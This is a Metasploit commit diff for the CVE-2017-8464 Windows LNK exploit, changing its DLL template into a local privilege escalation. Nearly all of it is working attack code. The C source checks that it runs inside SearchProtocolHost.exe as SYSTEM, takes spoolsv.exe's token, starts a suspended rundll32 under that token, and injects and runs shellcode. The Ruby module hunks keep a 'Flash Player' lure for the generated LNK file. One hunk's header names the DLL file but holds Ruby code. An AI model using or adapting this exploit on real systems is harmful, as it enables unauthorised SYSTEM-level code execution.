Change the template technicque to work as an LPE

Author: zeroSteiner

data/exploits/cve-2017-8464/src/build.sh

@@ -8,8 +8,10 @@ ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
 ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
 ${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
 rm -f temp.dll *.o
+chmod -x ../template_x64_windows.dll
 
 ${CCx86}-gcc -c -Os template.c -Wall -shared
 ${CCx86}-dllwrap --def template.def *.o -o temp.dll
 ${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
 rm -f temp.dll *.o
+chmod -x ../template_x86_windows.dll

data/exploits/cve-2017-8464/src/template.c

@@ -1,25 +1,17 @@
-// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
-// - removed ExitThread(0) to prevent an Explorer crash
-// - added Mutex to prevent invoking payload multiple times (at least try)
 #include <windows.h>
-#include "template.h"
+#include <sddl.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include <userenv.h>
 
-void inline_bzero(void *p, size_t l)
-{
-	BYTE *q = (BYTE *)p;
-	size_t x = 0;
-	for (x = 0; x < l; x++)
-		*(q++) = 0x00;
-}
+#include "template.h"
 
-void ExecutePayload(void);
+void ExecutePayload(HANDLE hDll);
 
-BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-	switch (dwReason)
-	{
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+	switch (dwReason) {
 	case DLL_PROCESS_ATTACH:
-		ExecutePayload();
+		ExecutePayload(hDll);
 		break;
 
 		case DLL_PROCESS_DETACH:
@@ -31,65 +23,232 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 		case DLL_THREAD_DETACH:
 		break;
 	}
+	return TRUE;
+}
+
+BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
+	int result;
+
+	if (strlen(szStr) < strlen(szSuffix)) {
+		return FALSE;
+	}
+	if (bCaseSensitive) {
+		result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+	}
+	else {
+		result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+	}
+	return result == 0;
+}
+
+BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
+	HANDLE hToken;
+	DWORD dwLength = 0;
+	TOKEN_USER *tuUser = NULL;
+	SIZE_T szSid = 0;
+
+	*pSid = NULL;
+	do {
+		if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
+			return FALSE;
+		}
+
+		GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
+		tuUser = (TOKEN_USER *)malloc(dwLength);
+		if (tuUser == NULL) {
+			break;
+		}
+
+		if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
+			break;
+		}
+
+		szSid = GetLengthSid(tuUser->User.Sid);
+		*pSid = LocalAlloc(LPTR, szSid);
+		if (*pSid == NULL) {
+			break;
+		}
+
+		if (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid)) {
+			LocalFree(*pSid);
+			*pSid = NULL;
+		}
+	} while (FALSE);
+
+	if (tuUser != NULL) {
+		free(tuUser);
+	}
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+
+	if (*pSid != NULL) {
+		return TRUE;
+	}
+	return FALSE;
+}
+
+BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
+	PSID pTestSid = NULL;
+	PSID pTargetSid = NULL;
+
+	if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
+		return FALSE;
+	}
 
+	if (!GetProcessSid(hProc, &pTestSid)) {
+		LocalFree(pTargetSid);
+		return FALSE;
+	}
+
+	*pbResult = EqualSid(pTestSid, pTargetSid);
+	LocalFree(pTargetSid);
+	LocalFree(pTestSid);
 	return TRUE;
 }
 
-void ExecutePayload(void)
-{
+DWORD FindProcessId(LPCTSTR szProcessName) {
+	HANDLE hProcessSnap;
+	PROCESSENTRY32 pe32;
+	DWORD result = 0;
+
+	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (hProcessSnap == INVALID_HANDLE_VALUE) {
+		return 0;
+	}
+
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+	if (!Process32First(hProcessSnap, &pe32)) {
+		CloseHandle(hProcessSnap);
+		return 0;
+	}
+
+	do {
+		if (!strcmp(szProcessName, pe32.szExeFile)) {
+			result = pe32.th32ProcessID;
+			break;
+		}
+	} while (Process32Next(hProcessSnap, &pe32));
+	CloseHandle(hProcessSnap);
+	return result;
+}
+
+HANDLE GetPayloadToken(void) {
+	HANDLE hTokenHandle = NULL;
+	HANDLE hProcessHandle = NULL;
+	BOOL bIsSystem = FALSE;
+	DWORD dwPid = 0;
+	CHAR Path[MAX_PATH + 1];
+
+	ZeroMemory(Path, sizeof(Path));
+	GetModuleFileNameA(NULL, Path, MAX_PATH);
+	if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) {
+		return NULL;
+	}
+	/* loaded into the context of SearchProtocolHost.exe */
+
+	if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
+		return NULL;
+	}
+	/* and running as NT_AUTHORITY SYSTEM */
+
+	dwPid = FindProcessId("spoolsv.exe");
+	if (!dwPid) {
+		return NULL;
+	}
+
+	hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
+	if (!hProcessHandle) {
+		return NULL;
+	}
+
+	bIsSystem = FALSE;
+	if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
+		return NULL;
+	}
+	/* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
+
+	OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
+	CloseHandle(hProcessHandle);
+	return hTokenHandle;
+}
+
+DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
+	/* wait for the process to exit or 10 seconds before cleaning up */
+	WaitForSingleObject(pExploitData->hProcess, 10000);
+	CloseHandle(pExploitData->hProcess);
+	CloseHandle(pExploitData->hMutex);
+
+	/* this does not return */
+	FreeLibraryAndExitThread(pExploitData->hModule, 0);
+	return 0;
+}
+
+void ExecutePayload(HANDLE hDll) {
 	PROCESS_INFORMATION pi;
 	STARTUPINFO si;
 	CONTEXT ctx;
 	LPVOID ep;
-	HANDLE hMutex;
 	SECURITY_ATTRIBUTES MutexAttributes;
+	SIZE_T dwBytesWritten = 0;
+	PEXPLOIT_DATA pExploitData = NULL;
+	HANDLE hToken;
 
-	inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
+	pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
+	if (!pExploitData) {
+		return;
+	}
+
+	/* keep a reference to the module for synchronization purposes */
+	GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
+
+	ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
 	MutexAttributes.nLength = sizeof(MutexAttributes);
 	MutexAttributes.bInheritHandle = TRUE; // inherit the handle
-	hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
-	if(hMutex == NULL)
-	{
+	pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
+	if (!pExploitData->hMutex) {
 		return;
 	}
 
-	if(GetLastError() == ERROR_ALREADY_EXISTS)
-	{
-		CloseHandle(hMutex);
+	if (GetLastError() == ERROR_ALREADY_EXISTS) {
+		CloseHandle(pExploitData->hMutex);
 		return;
 	}
 
-	if(GetLastError() == ERROR_ACCESS_DENIED)
-	{
-		CloseHandle(hMutex);
+	if (GetLastError() == ERROR_ACCESS_DENIED) {
+		CloseHandle(pExploitData->hMutex);
 		return;
 	}
 
-	// Start up the payload in a new process
-	inline_bzero(&si, sizeof(si));
+	hToken = GetPayloadToken();
+
+	ZeroMemory(&si, sizeof(si));
 	si.cb = sizeof(si);
 
-	// Create a suspended process, write shellcode into stack, resume it
-	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+	/* start up the payload in a new process */
+	if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
 		GetThreadContext(pi.hThread, &ctx);
-
 		ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
+		if (dwBytesWritten == SCSIZE) {
 
 #ifdef _WIN64
-		ctx.Rip = (DWORD64)ep;
+			ctx.Rip = (DWORD64)ep;
 #else
-		ctx.Eip = (DWORD)ep;
+			ctx.Eip = (DWORD)ep;
 #endif
 
-		SetThreadContext(pi.hThread, &ctx);
-		ResumeThread(pi.hThread);
+			SetThreadContext(pi.hThread, &ctx);
+			ResumeThread(pi.hThread);
 
-		CloseHandle(pi.hThread);
-		CloseHandle(pi.hProcess);
+			CloseHandle(pi.hThread);
+			pExploitData->hProcess = pi.hProcess;
+		}
 	}
 
-	CloseHandle(hMutex);
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
 }
-

data/exploits/cve-2017-8464/src/template.h

@@ -1,3 +1,11 @@
 #define SCSIZE 2048
 unsigned char code[SCSIZE] = "PAYLOAD:";
 
+typedef struct {
+	HANDLE hModule;
+	HANDLE hMutex;
+	HANDLE hProcess;
+} EXPLOIT_DATA, *PEXPLOIT_DATA;
+
+#define SIDSTR_SYSTEM _T("s-1-5-18")
+#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)

data/exploits/cve-2017-8464/template_x64_windows.dll

@@ -47,8 +47,8 @@ def initialize(info = {})
           ],
         'DefaultOptions'  =>
           {
-            'EXITFUNC'    => 'thread',
-            'WfsDelay'    => 45,
+            'EXITFUNC'    => 'process',
+            'WfsDelay'    => 30,
           },
         'Arch'            => [ARCH_X86, ARCH_X64],
         'Payload'         =>
@@ -78,14 +78,14 @@ def initialize(info = {})
     register_advanced_options(
       [
         OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
-        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
-        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
+        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
 
   def exploit
-    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
     arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
     datastore['EXE::Path'] = path
     datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -105,8 +105,8 @@ def exploit
   def generate_link(path)
     vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
-    comment = datastore['LNK_COMMENT'].dup << "\x00"
+    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
+    comment = datastore['LnkComment'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [